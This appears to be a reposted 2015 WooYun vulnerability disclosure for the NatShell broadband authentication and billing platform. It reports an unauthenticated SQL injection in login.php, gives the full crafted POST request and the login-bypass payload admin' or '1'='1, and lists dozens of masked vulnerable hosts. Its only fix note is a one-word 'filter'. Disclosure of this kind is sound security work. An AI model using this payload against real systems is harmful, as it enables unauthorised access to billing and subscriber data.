记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

NatShell宽带认证计费系统设备存在SQL注入(无需登录DBA权限)

2015-12-14 15:20

问题产品地址http://**.**.**.**/renzhengjifeiguanli/

蓝海网络认证计费管理平台产品存在SQL注入(无需登录DBA权限)



code 区域
POST /login.php?action=check HTTP/1.1

Host: **.**.**.**:8888

Content-Length: 418

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://**.**.**.**:8888

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUAzJCuOBoxBVjZcp

Referer: http://**.**.**.**:8888/login.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: PHPSESSID=c1b976p87tkjs4t4hoseabed81



------WebKitFormBoundaryUAzJCuOBoxBVjZcp

Content-Disposition: form-data; name="username"



admin*

------WebKitFormBoundaryUAzJCuOBoxBVjZcp

Content-Disposition: form-data; name="pwd"



admin

------WebKitFormBoundaryUAzJCuOBoxBVjZcp

Content-Disposition: form-data; name="x"



47

------WebKitFormBoundaryUAzJCuOBoxBVjZcp

Content-Disposition: form-data; name="y"



1

------WebKitFormBoundaryUAzJCuOBoxBVjZcp--



参数username和参数pwd都存在注入



漏洞证明:

可使用万能密码登录(admin' or '1'='1/admin' or '1'='1)



aaaaaaaaaaa11111111111111111.jpg





aaaaaaaaaaaaaaaa222222222222222222222.jpg





aaaaaaaaaaaaaaaa33333333333333333.jpg





aaaaaaaaaaaaa44444444444444444.jpg





案例:

code 区域
**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**/login.php

**.**.**.**/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

**.**.**.**:8888/login.php

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2015-0140364

阅读:105891 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“NatShell宽带认证计费系统设备存在SQL注入(无需登录DBA权限)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云